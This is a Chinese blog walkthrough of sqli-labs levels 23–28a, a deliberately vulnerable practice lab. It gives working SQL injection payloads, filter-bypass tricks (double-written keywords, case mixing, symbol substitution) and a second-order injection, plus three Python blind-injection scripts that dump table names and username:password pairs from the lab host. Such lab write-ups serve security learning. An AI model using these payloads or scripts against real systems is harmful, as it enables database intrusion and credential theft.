sqli.labs靶场(23关到28a关)

已于 2024-02-01 18:07:30 修改
阅读量1.4k 收藏 14
点赞数 20
文章标签: sql 数据库
于 2024-02-01 18:06:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/lyy8910599download/article/details/135950072
版权

23、第二十三关

id=1'单引号闭合

找位置1' and 1=2 union select 1,2,3'

爆库:1' and 1=2 union select 1,2,database()'

爆表名:1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' '

爆字段:1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' '

爆数据:1' and 1=2 union select 1,2,group_concat(username,':',password) from users where '1'='1

24、第二十四关

我们先注册一个账号admin'#,密码设为123

然后登录进去,有个重置密码:

输入当前密码123,新密码111,然后点Reset

然后我们用新密码登录试试

发现修改后的密码111没法登录admin'#账号,还得用原来密码登录

用新密码111登录admin账号试试

发现可以登陆成功,我们刚才改的用该是admin的密码

这个应该就是传说中的二次注入吧

修改密码是应该是没转移用户名导致的,修改语句应该是下面这样,$username里特殊字符没转译

update users set password='$password' where username='$username'

25:、第二十五关

这关是单引号闭合,提示过滤了and,or,那就只能用其他代替比如like

like绕过:1'like 1=2 like extractvalue(1,concat(0x7e,database(),0x7e))--+

双写绕过:1' anandd 1=2 like extractvalue(1,concat(0x7e,database(),0x7e))--+

anand 或oorr这样

25a、第二十五a关

这关提示大写的OR和AND过滤了

这个id是数值型的,也可以用双写绕过

100%20anandd%201=1%20union%20select%201,2,3#

爆库:

and双写:100 anandd 1=1 union select 1,2,database()#

or双写:100 oorr 1=0 union select 1,2,database()#

like绕过:100 like 1=2 union select 1,2,database()#

100 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security' #

infoorrmation_schema里面包含or也可以双写绕过

26、第二十六关

这关是单引号闭合,提示过滤空格

这关and和or过滤了,空格也过滤了,可以用||替换or,%26替换and用报错注入

POC:1'%26extractvalue(1,concat(0x7e,database(),0x7e))%261='1

POC:1'||extractvalue(1,concat(0x7e,database(),0x7e))||1='1

POC:1'||extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security')),0x7e))||1='1

26a、第二十六a关

这关和26管类似,但是以单引号加括号闭合

id=1')%26('1')=('1

无法使用报错注入,只能用盲注

爆库POC:1')%26(substr(database(),1,1)='s')%26('1')=('1

爆表名POC:

1')%26(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security')),1,1)='e')%26('1')=('1

上脚本:

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_","UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-26a/?id=1%27)"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"%26(substr(database(),{p},1)='{a}')%26('1')=('1"
            res = requests.get(url_db)
            if "Dumb" in res.text:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"%26(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='{database}')),{p},1)='{a}')%26('1')=('1"
            num += 1
            res = requests.get(url_db)
            if "Dumb" in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"%26(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='{database}')%26(table_name='users')),{p},1)='{a}')%26('1')=('1"
            num += 1
            res = requests.get(url_db)
            if "Dumb" in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"%26(substr((select(group_concat(username,':',passwoorrd))from(users)),{p},1)='{a}')%26('1')=('1"
            num += 1
            res = requests.get(url_db)
            if "Dumb" in res.text:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

27、第二十七关

直接试探1 union select 1,2,3

发现查的是id=11的值,select和union都被过滤,可以大小写绕过,尝试发现是单引号闭合

构造poc:

1'and(extractvalue(1,concat(0x7e,database(),0x7e))) or '1'='1

1'and(extractvalue(1,concat(0x7e,(SeLect (group_concat(table_name)) from (information_schema.tables) where (table_schema='security')),0x7e))) or '1'='1

1'and(extractvalue(1,concat(0x7e,(SeLect (group_concat(column_name)) from (information_schema.columns) where (table_schema='security')and(table_name='users')),0x7e))) or '1'='1

1'and(extractvalue(1,concat(0x7e,(SeLect (group_concat(username,':',password)) from (users)),0x7e))) or '1'='1

27a、第二十七a关

提示双引号闭合,试探一下

没有报错信息,只能盲注

1"and(length(database())>8)and"1"="1

1"and(length(database())>7)and"1"="1

database()的长度是8

这个还是脚本爆料:

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-27a/?id=1%22"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and(substr(database(),{p},1)='{a}')and%221%22=%221"
            res = requests.get(url_db)
            if "Dumb" in res.text:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')and%221%22=%221"
            num += 1
            res = requests.get(url_db)
            if "Dumb" in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='users')),{p},1)='{a}')and%221%22=%221"
            num += 1
            res = requests.get(url_db)
            if "Dumb" in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            if a == "UNHEX('2D')":
                url_db = url + f"and(substr((selEcT(group_concat(username,':',password))from(users)),{p},1)={a})and%221%22=%221"
            else:
                url_db = url + f"and(substr((selEcT(group_concat(username,':',password))from(users)),{p},1)='{a}')and%221%22=%221"
            num += 1
            res = requests.get(url_db)
            if "Dumb" in res.text:
                if a == "UNHEX('2D')":
                    a = '-'
                users = f"{users}{a}"
                print(a, end='')
                num = 0

28、第二十八关

尝试后发现也是单引号闭合,且过滤空格,没有报错信息,也需要盲注

1'and(length(database())>8)and'1'='1

1'and(length(database())>7)and'1'='1

数据库长度应该是8

盲注还得看脚本

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-28/?id=1'"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and(substr(database(),{p},1)='{a}')and'1'='1"
            res = requests.get(url_db)
            if "Dumb" in res.text:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')and'1'='1"
            num += 1
            res = requests.get(url_db)
            if "Dumb" in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='users')),{p},1)='{a}')and'1'='1"
            num += 1
            res = requests.get(url_db)
            if "Dumb" in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            if a == "UNHEX('2D')":
                url_db = url + f"and(substr((selEcT(group_concat(username,':',password))from(users)),{p},1)={a})and'1'='1"
            else:
                url_db = url + f"and(substr((selEcT(group_concat(username,':',password))from(users)),{p},1)='{a}')and'1'='1"
            num += 1
            res = requests.get(url_db)
            if "Dumb" in res.text:
                if a == "UNHEX('2D')":
                    a = '-'
                users = f"{users}{a}"
                print(a, end='')
                num = 0

28a、第二十八a关

这关貌似和28关没啥区别,同样方法尝试

1'and(length(database())>7)and'1'='1

1'and(length(database())>8)and'1'='1

尝试后发现过滤了union select

看过源码后发现是单引号加括号闭合,于是构造轮子尝试union select可以双写绕过

31') unionunion select select 3,2,1 and('1')=('1

爆库:31') unionunion select select 1,database(),3 and ('1')=('1

31') unionunion select select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security') ,3 and ('1')=('1

31') unionunion select select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 and ('1')=('1

31') unionunion select select 1,(select group_concat(username,'~',password) from users),3 and ('1')=('1

sqli-labs23(基于get提交的过滤注释符的报错注入)
zyh1588的博客
01-15 1275
小白回顾sql靶场23
sqli-labs靶场
没有网络安全就没有国家安全
08-22 898
sqli-labs文牒
sqli-labs(23)
mmzkyl的博客
01-29 312
卡是使用 ’ 进行闭合,但是在注释的使用上做了一些限制 先测试下面这两个payload: http://192.168.2.60/sqli-labs/Less-23?id=1'# http://192.168.2.60/sqli-labs/Less-23?id=1'--+ 若是不对输入进行过滤,上面两个payload均是能够返回正常页面,但是测试后发现上述两个payload均无法返回正常页面 # 与 --均被过滤,本题最大的难题便是无法通过注释来注释掉多余的单引号,总而无法完成注入,使用上面两个pay
sqli-labs23
rp114514的博客
07-03 254
在本中,我们学习了如何判断是否存在SQL注入,如何利用错误信息推断数据库名称、表名和字段名。这些技巧不仅提高了我们的SQL注入攻击能力,也增强了我们对数据库安全的理解。今天的实训课我们挑战了sqli-labs23,这是一个错误型盲注的挑战,主要的目标是通过利用错误信息来推断出数据库中的数据,而不是直接显示在页面上。错误判断出以后,然后利用判断库名,列名,数据的方法进一步探索数据库中的其他表和字段,以及可能的敏感数据。我们可以看到,--%20没有生效,在后面加上#,依旧抛出错误。判断是否存在注入:?
sqli-labs-第23 单引号‘以及 and‘1 闭合引号代替注释符
weixin_73904941的博客
10-03 928
sqli-labs靶场---单引号' 以及 and'1 闭合引号代替注释符
sqli-labs23
qq_53030229的博客
05-30 192
文章目录一、审查源码 一、审查源码 这里我就捡重要的代码挑出来说一下 preg_replace 函数执行一个正则表达式的搜索和替换,将reg $reg = "/#/"; $reg1 = "/--/"; $replace = ""; $id = preg_replace($reg, $replace, $id); $id = preg_replace($reg1, $replace, $id); $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
sqli-labs靶场实战25-30题
qq_42261604的博客
02-28 4022
Less-25 过滤or和and,过滤方式是将其替换为空,使用双重字符可绕过,如oorr,anandd。 单引号注入判断 http://127.0.0.1/sql/Less-25/?id=1' anandd 1=2 -- - 异常 http://127.0.0.1/sql/Less-25/?id=1' anandd 1=1 -- - 登录成功 报错注入 http://127.0.0.1/sql/Less-25/?id=1' anandd update...
sqli-labs Less-26、26a、27、27a、2828a(sqli-labs指南 26、26a、27、27a、2828a)—Advanced injection
m0_54899775的博客
12-25 1514
sqli-labs Less-26、26a、27、27a、2828a(sqli-labs指南 26、26a、27、27a、2828a)—Advanced injection
《从0到1000》sqli-labs1-75解题记录
BaiScorpio的博客
05-17 1409
1
sqli-labs注入——sqli-labs的1-65指南
qq_51366383的博客
01-27 1956
sqli-labs图片上一共有75,但是下载的资料都只有65,所以只写了65,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
Sqlilabs-23
KAKA的博客
07-14 597
23 对注入字符做了正则表达式的过滤,所以需要在引号上下功夫: http://sqlilabs/Less-23/?id=1' and '1 知道了原理构造起来就很简单了: –查表 http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from informatIon_schema.tables where table_schema=database()),3 and '1' = '1 简化: .
SQLi Labs Lesson23
1ame的博客
08-18 397
Lesson - 23 GET - Error based - stripcomments 首先进入欢迎界面 又回到了,最开始的地方: 构造?id=1,结果如图所示: 构造?id=1',结果如图所示: 没有闭错误回显,同时没有对单引号进行过滤。 构造?id=0 ' union select 1,2,3 # 结果如图所示:
sqli-labs2828a
weixin_46023655的博客
07-31 421
sqli-labs2828a
sqli-labs--23-37指南(详细)
weixin_44576725的博客
11-14 1922
文章目录Less-23Less-24Less-25Less-25aLess-26Less-26aLess-27Less-27aLess-28Less-28aLess-29背景知识:正题:Less-30Less-31Less-32Less-33Less-34Less-35Less-36Less-37总结Less-37总结 前言:本节开始对advanced injections卡进行通记录,23-38 在这里补充一下信息收集的命令: @@version 数据库版本 @@datadir 数据库数据路径 @
SQL-labs的第28——union和select被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-04 472
的空格、-和注释也别屏蔽了。这里是屏蔽union select这个组合而不是单个的union或select。并且该不返回错误,所以不使用?id=1\,而且也不使用报错注入。
sqli-labs-master第23
m_ing
05-17 1458
前言:从一开始我们是GET-----POST的路线来研究sql注入,这我们在从头早来研究GET请求方式。 http://192.168.89.139/sqli-labs-master/Less-23/ 我看到这个页面很是熟悉,提示我们输入id值作为参考。 我们加个’试一下 再来利用and来测试下,加入注释符#,编码成%23同样的报错 我们感到很好奇,还是看下原本代码 对注释符等都进行了过滤 突然一懵,我查阅了一些资料,只能采用单引号闭合的方法来绕过了,我们试试看! ?id 1=1’ and ‘1’=
基于Sqli-Labs靶场SQL注入-25~28
Joker
01-07 1738
这一篇博客我主要讲了各种语句被注释后的绕过方法,包括 and 和 or 的绕过、空格和注释符的绕过、union 和 select 的绕过。
sqli--labs 进阶篇 23_24
Lucky小小吴的小屋
01-30 651
直接登录进入,通过注册一个含有特殊字符的账号,再修改密码,从而修改掉原本的数据库中已存在的账号信息。到这里,自己没有什么思路,不知道怎么注入,看了下题目讲到二阶注入,猜测我们需要在。pass_change.php 登录成功后,有更新操作的处理。源码文件,重要的只有四个,下面就依次看一下源码文件的具体功能。更新账号密码时,账户信息没有过滤,是直接更新的,可以利用!注册一个新的,账号:admin’# ,密码:123。进一步确定自己的推论,源码中,存在过滤掉一些注释语句。
SQL-labs的第23——注释被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-03 304
这说明只有第一个和第二个位置是回显位,我们只需要在这两个位置进行注入就行。其实只有第二个是回显位,第一个也不是。但是如果是3个null,那么不会报错,这说明总共有3个注入位置。我们有添加了),但是仍然报错,这时我们怀疑注释符被屏蔽了。接下来,我们看一下,那个位置可以进行回显。我们猜测闭合方式是'。说明闭合方式是',并且注释符被屏蔽了。我们发现这里好像有回显,我们输入语句。使用报错注入也可以。
sqli-labs 靶场
最新发布
12-30
### sqli-Labs 靶场教程 #### 访问与初始化设置 访问本地部署的sqli-Labs,通过浏览器输入`http://localhost/sqli-labs/`并按下回车键,可以查看到sqli-Labs首页界面[^1]。 对于初次使用者而言,在开始挑战之前需先完成数据库配置工作。点击页面中的“Setup/reset Database for labs”,这一步骤会自动下载所需的Labs数据库文件;当提示信息显示操作已完成时,表明环境搭建完毕,可正式进入实验环节[^2]。 #### 开始闯练习 返回至`sqli-labs`主页后,用户能够依据个人兴趣选择不同的卡进行尝试。每道题目对应着特定类型的SQL注入攻击场景设计,旨在让参与者逐步掌握从简单到复杂的各类技巧。 - **基础入门** - 初始几主要围绕最基本的GET请求参数注入展开,比如在URL后面附加特殊字符来探测服务器响应行为的变化情况。 - **中级提升** - 接下来可能会涉及到联合查询(UNION SELECT)、基于布尔盲注以及时间延迟型盲注等多种形式的学习。 - 更深入的内容则包括但不限于绕过WAF防护措施、利用存储过程实现更复杂的数据操纵等高阶技能训练。 #### 使用工具辅助分析 针对某些较为棘手的任务,推荐采用专业的安全测试软件如SQLMap来进行自动化检测和支持。这类工具有助于快速定位潜在的安全隐患所在,并能自动生成相应的payload供进一步研究使用[^3]。 ```bash # 基本命令示例:启动sqlmap扫描指定url sqlmap -u "http://example.com/vulnerable?param=value" ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值